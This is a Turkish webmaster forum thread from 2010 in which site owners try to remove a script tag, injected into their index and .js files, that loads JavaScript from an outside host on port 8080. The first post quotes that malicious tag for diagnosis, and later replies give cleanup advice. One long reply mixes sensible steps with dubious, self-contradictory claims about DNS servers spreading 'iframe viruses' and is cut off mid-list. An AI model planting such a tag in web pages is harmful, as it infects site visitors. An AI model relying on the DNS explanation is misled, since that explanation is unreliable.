• 25-06-2010, 03:21:27
    #1
    Resellerim de barınan bütün sitelerde zararlı kodlar bulunmaya başladı.

    <script type="text/javascript" src="http://dolgo.lulucabana.com:8080/Script.js"></script>
    <!--d8a5563386e76cc7551aa490d74b9f9c-->

    Bu kodu index.php veya index.html veya .js uzantılı dosyaların içerisine gömülü halde buluyorum. Silip düzenledim fakat daha 24 saat geçmeden tekrar sitelerin hepsinde aynı sorun ortaya çıktı.

    Nasıl bir önlem alabilirim. Yardımcı olabilecek arkadaş var mı?
  • 25-06-2010, 03:32:42
    #2
    Onu Silersen Tekrar Gelir

    Satis@Tekbirhost.com

    Eklersen Yardımcı olabilirim
  • 25-06-2010, 03:44:13
    #3
    🌐 xvizyon ❤ r10
    Edit: konuyu yanlıs anlamısım.
  • 01-07-2010, 03:21:14
    #4
    hocam düzeltebildin mi? bende de aynı sorun var..
  • 03-07-2010, 00:39:46
    #5
    düzenleme yaptım fakat tekrar attılar... bütün siteleri ftp şifresini filan herşeyi değiştirdim. böyle bir önlem aldım sanırım işe yaradı fakat bir wordpress sitemde dosyaları yeniledim falan ama halen düzelme olmadı. hangi dosyanın içerisinde saklı onu da bulamadım.

    index.php , .js uzantılı dosyalar ve .htaccess dosyalarını kontrol et...
  • 03-07-2010, 13:59:50
    #6
    Üyeliği durduruldu
    Bu soruna tam olarak çözümü olan var mı acaba ? Aynı problemleri bende yaşadım, çareyi bütün dosyaları temizlemekle buldum, ayrıca FTP bilgilerini değiştirdim.

    Ama tam olarak verim alamadım nereden bulaşıyor bu zararlı kodlar kaynağını bulmak lazım
  • 06-07-2010, 13:02:06
    #7
    Merhaba Bu kodlarla ilgil zamanında bir yazı okumuştum. Aşağıya yazdım, faydalı olacağını düşünüyorum...

    Bir Tür Fake Sanal h.a.c.k Yöntemidir.Direkt Dosyalara ulaşmayan ancak Kanalları kullanarak sisteme kısmen erişen Çoğulcu virüstür.



    NASIL BULAŞIR: Değerli Arkadaşlar 3 Türlü Yol Vardır



    1- Null Scriptler

    2- Null programlar

    3- BU EN ÖNEMLİSİ VE EN ÇOK YAPILANI DNS DEĞİŞKENLERİ

    Özellikle JUSTİN TV VE YOUTUBE de Kullanılan DNS ler için Başını çekiyor…



    ÖRNEĞİN SİZE VERECEĞİMİZ AŞAĞIDAKİ DNS BİR �FRAME VİRÜSÜ YAYAN DNS DİR.

    ASLIDNA ÇOK HIZLI ÇALIŞIR.NORMALİNDNEN DAHA FAZLA HIZLIDIR.

    ANCAK KULLANDIKTAN BİR SÜRE SONRA FARKEDECEKSİNİZ Kİ FTP PROGRAMINIZA KAYITLI BÜTÜN SİTELERİNİZE İFRAME BULAŞMIŞTIR. DNS KULLANIRKEN DİKKAT!!!



    212.58.3.2

    212.58.4.2



    HANGİ DOSYALARA BULAŞIR:



    index.php (asp)

    main.php (asp)

    header.php (asp)

    Footer.php (asp)

    index.html (htp)

    admin.php (asp)



    Endişe Etmeyin Sadece bu dosyalara bulaşmaktadır.Diğer dosyalara bulaşmamaktadır.

    Gezin bakın bunu farkedeceksiniz.



    ÇÖZÜM: Eğer iframe Web Sitelerinize Bulaşmış ise Öncelikle Derhal FTP ŞİFRENİZİ değiştirin. Göreceksiniz İFRAME VİRÜSÜ Sitelerinize Erişimi yitirecektir.

    Bulaşan bütün dosyalardaki iframeleri silin.



    Bilgisayarınızı Taratın ve en az 10 adet solucan veya trojan mutlaka çıkacaktır.

    Bu iframelerden bulaşmaktadır…



    Bu acizane yazı ile sitesinde iframe virüsü olanlar, bu virüsten kurtulabilecek.



    1-)öncelikle Advanced Find and Replace adındaki kurulumu saniyeler süren ufak çaptaki programı indiriyoruz. (Google’a yazarsanız çıkacaktır)



    2-)daha sonra ftp’den sitenize bağlanıp ftp’de ki tüm dosyaları masaüstünden yeni bir klasör açıp o klasöre gönderin. (unutmayın iframe virüsü kullanılan veya kullanılmayan tüm dosyalara bulaşıyor.)



    3-)aktarımlar tamamlandıktan sonra indirmiş olduğumuz programı açıp, masaüstündeki klasörün adresini browse yazan kısma yapıştırın.
  • 06-07-2010, 13:58:25
    #8
    virüsleri temizleyip dosyaları değiştirdikten sonra kendi bilgisayarınızda temizleme yapmayı deneyin büyük ihtimalle bilgisayarınızda da bu dosyalar barınmakta. Bir diğer konuda dosyalarınızı temiz dosyalar ile değiştirdikten sonra ftp şifrenizi karışık kombinasyonlu olarak değiştirmelisiniz ve şifrenizi ftp ve benzeri programlarda kayıtlı tutmamalısınız. Bunları yaptıktan sonra büyük ihtimal ile bir sorun yaşamazsınız.
  • 20-08-2010, 23:55:42
    #9
    https://www.r10.net/1061749211-post4.html burada bir kısmını anlattım. Ayrıntı yerleri var. Bakarsan yardımcı olabilir.